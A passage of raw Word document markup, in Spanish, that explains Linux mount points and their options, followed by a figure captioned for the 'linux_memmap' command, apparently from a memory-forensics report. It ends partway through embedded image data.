        <w:t>Usado para control de recursos y aislamiento de grupos de procesos. Las opciones indican un enfoque en seguridad y rendimiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883D928" w14:textId="75C9B93C" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tmpfs (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/sys/fs/cgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752ED4EE" w14:textId="331A0C78" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sistema de archivos temporal en memoria, utilizado para almacenamiento de corta duración y rápido acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABA2FA" w14:textId="7F93785F" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev/xvda1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739815AD" w14:textId="2BB1A109" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sistema de archivos principal, ext4 proporciona robustez y mejor manejo de grandes archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C848B47" w14:textId="01A350BE" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proc (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/bus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DFFF54" w14:textId="5EB98C1A" w:rsidR="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usado para acceder a información del sistema y procesos en ejecución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73531FDD" w14:textId="3C68D208" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pstore (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/sys/fs/pstore</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA6648" w14:textId="0D6B6050" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Almacenamiento persistente para registros del núcleo y datos de diagnóstico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32C1E1" w14:textId="7C4F1EAB" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fusectl (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/sys/fs/fuse/connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944B9E4" w14:textId="0BDFA0FC" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Interfaz para sistemas de archivos FUSE, permite a usuarios no privilegiados crear sus propios sistemas de archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C41E9" w14:textId="5D7CD85B" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lxcfs (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/lib/lxcfs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31995891" w14:textId="7CC2D7ED" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proporciona un sistema de archivos virtual para contenedores LXC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7931B" w14:textId="5FE4710E" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev/loop0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/snap/core/5328</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69036A3E" w14:textId="76CBA617" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usado para montar imágenes de Snap, squashfs es eficiente en espacio y de solo lectura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FBAE5" w14:textId="340BF5BF" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>udev (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81AC05" w14:textId="14569E1B" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sistema de archivos para dispositivos, gestionado dinámicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B12AF0" w14:textId="486B694E" w:rsidR="00D35DDC" w:rsidRPr="007E3822" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3822">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cgroup (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/sys/fs/cgroup/unified</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3822">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8FAF9" w14:textId="3199846E" w:rsidR="00D35DDC" w:rsidRPr="007E3822" w:rsidRDefault="00D35DDC" w:rsidP="007E3822">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3822">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nueva versión de cgroup para mejor gestión de recursos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D8AE1" w14:textId="1B882409" w:rsidR="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="00D35DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los restantes puntos de montaje siguen patrones similares en cuanto a tipos y opciones, enfocándose en la seguridad (nosuid, nodev, noexec), rendimiento (relatime), y tipo de acceso (ro</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ro: Read-only, se refiere a datos o dispositivos que solo pueden ser leídos, no modificados.</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D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, rw</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>rw: Read-write, se refiere a datos o dispositivos que pueden ser leídos y escritos/modificados.</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D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Los sistemas de archivos como tmpfs, squashfs, y cgroup son comunes en entornos Linux y son utilizados para propósitos específicos como almacenamiento temporal, montaje de paquetes de software, y gestión de recursos del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76412139" w14:textId="50DB1BA6" w:rsidR="00AA7FAD" w:rsidRDefault="00487731" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251757568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B61113A" wp14:editId="5937E8F2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243768</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5337810" cy="1722755"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="443330844" name="Grupo 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5337810" cy="1722755"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5337815" cy="1722755"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="993618339" name="Imagen 79" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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3157855" cy="1722755"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="985747920" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3303910" y="543464"/>
                            <a:ext cx="2033905" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2C6DC4C9" w14:textId="44B5E082" w:rsidR="006416DF" w:rsidRPr="00445BCB" w:rsidRDefault="006416DF" w:rsidP="006416DF">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>27</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="73" w:name="_Toc155782594"/>
                              <w:r>
                                <w:t xml:space="preserve">Comando </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00460B60">
                                <w:t>linux_memmap.</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61113A" id="Grupo 14" o:spid="_x0000_s1105" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:19.2pt;width:420.3pt;height:135.65pt;z-index:251757568;mso-position-horizontal:center;mso-position-horizontal-relative:margin" coordsize="53378,17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